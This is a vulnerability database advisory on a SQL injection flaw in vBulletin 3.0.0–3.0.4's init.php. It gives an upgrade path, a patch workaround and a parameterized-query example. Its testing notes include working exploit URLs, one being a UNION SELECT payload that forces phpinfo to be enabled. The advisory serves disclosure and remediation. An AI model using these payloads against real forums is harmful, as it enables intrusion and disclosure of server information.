ID: OSVDB:12702
Type: osvdb
Reporter: al3ndaleeb (al3ndaleeb@uk2.net)
Modified: 2005-01-02T07:09:55
Description
Vulnerability Description
vBulletin contains a flaw that allows an attacker to inject arbitrary SQL code. The specialtemplates variable in the init.php file is not properly validated, which allows an attacker to inject into or manipulate SQL queries.
Solution Description
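Upgrade to version 3.0.5 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): Open the init.php file and search for:

$datastoretemp = $DB_site->query("
SELECT title, data
FROM " . TABLE_PREFIX . "datastore
WHERE title IN ('" . implode("', '", $specialtemplates) . "')
");
unset($specials, $specialtemplates);

Replace it with these lines:

// Refuse to continue unless $specialtemplates is an array.
if(!is_array($specialtemplates))
    exit;

// Escape every element before it is placed inside the quoted IN (...) list.
$specialtemplate = array();
foreach ($specialtemplates AS $arrykey => $arryval) {
    $specialtemplate[] = addslashes($specialtemplates["$arrykey"]);
}

$datastoretemp = $DB_site->query("
SELECT title, data
FROM " . TABLE_PREFIX . "datastore
WHERE title IN ('" . implode("', '", $specialtemplate) . "')
");

unset($specials, $specialtemplates, $specialtemplate);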
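The workaround above still builds the IN (...) list by string concatenation. As an added example (not vBulletin code and not part of the original advisory), here is the same lookup written with bound parameters and an allowlist of titles. The PDO/SQLite setup, the table contents and the KNOWN_TITLES list are assumptions made for the illustration.

```php
<?php
// Added example: not vBulletin code. The in-memory table, its rows and
// the allowlist below are constructed for illustration.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE datastore (title TEXT PRIMARY KEY, data TEXT)");
$db->exec("INSERT INTO datastore VALUES ('options', 'serialized-options'),
                                        ('forumcache', 'serialized-forums')");

// Titles the application itself is allowed to request (assumed list).
const KNOWN_TITLES = ['options', 'forumcache', 'usergroupcache'];

/**
 * Fetch datastore rows for the requested titles.
 * Request data never becomes part of the SQL text: each title is bound
 * to its own placeholder, and unknown titles are dropped beforehand.
 */
function fetch_datastore(PDO $db, $titles): array
{
    if (!is_array($titles)) {
        return [];                       // same type check as the workaround
    }
    // Keep only string values that appear on the allowlist.
    $titles = array_values(array_filter($titles, function ($t) {
        return is_string($t) && in_array($t, KNOWN_TITLES, true);
    }));
    if ($titles === []) {
        return [];                       // "IN ()" is not valid SQL
    }
    // One "?" per remaining title; the values travel separately from the SQL.
    $marks = implode(', ', array_fill(0, count($titles), '?'));
    $stmt  = $db->prepare("SELECT title, data FROM datastore WHERE title IN ($marks)");
    $stmt->execute($titles);
    return $stmt->fetchAll(PDO::FETCH_KEY_PAIR);
}

// Legitimate request: the 'options' row is returned.
var_dump(fetch_datastore($db, ['options']));
// Scalar instead of an array (first test URL on this page): rejected.
var_dump(fetch_datastore($db, "al3ndaleeb')"));
// Array element containing a quote: dropped by the allowlist, so only
// 'options' is bound and queried.
var_dump(fetch_datastore($db, ["al3ndaleeb')", 'options']));
```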
Manual Testing Notes
An exploit example:
http://[victim]/forum/global.php?specialtemplates=al3ndaleeb')
http://[victim]/forum/global.php?do=phpinfo&specialtemplates[]=al3ndaleeb')
UNION SELECT concat('options') as title,concat('a:4:{s:15:"templateversion";s:5:"3.0.3";s:12:"allowphpinfo";s:1:"1";s:10:"languageid";s:1:"1";s:7:"styleid";s:1:"1";}') as data/*
References:
Vendor URL: http://www.vbulletin.com/
Vendor Specific Solution URL: http://www.vbulletin.com/forum/showthread.php?postid=791268
Other Advisory URL: http://beyonce.beyondsecurity.com/unixfocus/5HP050KEKM.html
Title: vBulletin init.php SQL Injection
Published: 2005-01-02T07:09:55
Affected software: vBulletin 3.0.0, 3.0.1, 3.0.2, 3.0.3, 3.0.4